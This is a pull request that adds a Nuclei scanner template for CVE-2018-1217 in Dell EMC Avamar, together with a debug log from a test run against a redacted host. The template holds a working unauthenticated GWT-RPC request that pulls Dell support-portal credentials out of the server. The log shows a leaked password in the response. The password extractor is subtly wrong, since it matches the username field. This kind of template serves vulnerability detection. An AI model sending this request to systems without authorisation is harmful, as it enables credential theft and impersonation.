### PR TITLE
Add CVE-2018-1217 (vKEV)

### DIFF
--- a/http/cves/2018/CVE-2018-1217.yaml
+++ b/http/cves/2018/CVE-2018-1217.yaml
@@ -1,0 +1,61 @@
+id: CVE-2018-1217
+
+info:
+  name: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
+  author: daffainfo
+  severity: critical
+  description: |
+    Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
+  reference:
+    - https://www.exploit-db.com/exploits/44441
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1217
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-1217
+    cwe-id: CWE-862
+    cpe: cpe:2.3:a:dell:emc_avamar:*:*:*:*:*:*:*:*, cpe:2.3:a:dell:emc_integrated_data_protection_appliance:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dell
+    product: emc_avamar,emc_integrated_data_protection_appliance
+    shodan-query: title:"AVAMAR"
+  tags: cve,cve2018,dell,avamar,vkev
+
+http:
+  - raw:
+      - |
+        POST /avi/avigui/avigwt HTTP/1.1
+        Host: {{Hostname}}
+        X-Gwt-Permutation: {{randstr}}
+        X-Gwt-Module-Base: https://{{Hostname}}/avi/avigui/
+        Content-Type: text/x-gwt-rpc; charset=UTF-8
+
+        7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword")'
+          - 'status_code == 200'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: username
+        group: 1
+        internal: true
+        regex:
+          - 'emcsupportUsername\\":\\"(.*?)\\"'
+
+      - type: regex
+        name: password
+        group: 1
+        internal: true
+        regex:
+          - 'emcsupportUsername\\":\\"(.*?)\\"'
+
+      - type: dsl
+        dsl:
+          - '"Username: " + username + ". Password: " + password'

--- a/http/cves/2018/CVE-2018-1217.yaml
+++ b/http/cves/2018/CVE-2018-1217.yaml
@@ -58,4 +58,4 @@ http:
 
       - type: dsl
         dsl:
-          - '"Username: " + username + ". Password: " + password'
+          - '"Username: " + username + " Password: " + password'

--- a/http/cves/2018/CVE-2018-1217.yaml
+++ b/http/cves/2018/CVE-2018-1217.yaml
@@ -21,7 +21,7 @@ info:
     vendor: dell
     product: emc_avamar,emc_integrated_data_protection_appliance
     shodan-query: title:"AVAMAR"
-  tags: cve,cve2018,dell,avamar,vkev
+  tags: cve,cve2018,dell,avamar,kev,vkev
 
 http:
   - raw:


### PR DESCRIPTION
### Template / PR Information

Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Debug

```

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2018-1217] Dumped HTTP request for https://REDACTED/avi/avigui/avigwt

POST /avi/avigui/avigwt HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15
Connection: close
Content-Length: 204
Content-Type: text/x-gwt-rpc; charset=UTF-8
X-Gwt-Module-Base: https://REDACTED/avi/avigui/
X-Gwt-Permutation: 33L34aPjiK12uBNpnBaiitpzVKe
Accept-Encoding: gzip

7|0|6|https://REDACTED/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|REDACTED|1|2|3|4|2|5|5|6|0|
[DBG] [CVE-2018-1217] Dumped HTTP response https://REDACTED/avi/avigui/avigwt

HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment
Content-Type: application/json; charset=utf-8
Date: Sun, 28 Sep 2025 17:07:44 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN

//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"REDACTED\",\"emcsupportPassword\":\"hacked3dsec\",\"disableLDLS\":false}"],0,7]
[CVE-2018-1217:dsl-1] [http] [critical] https://REDACTED/avi/avigui/avigwt ["Username: REDACTED. Password: REDACTED"]
[INF] Scan completed in 1.355218542s. 1 matches found.
```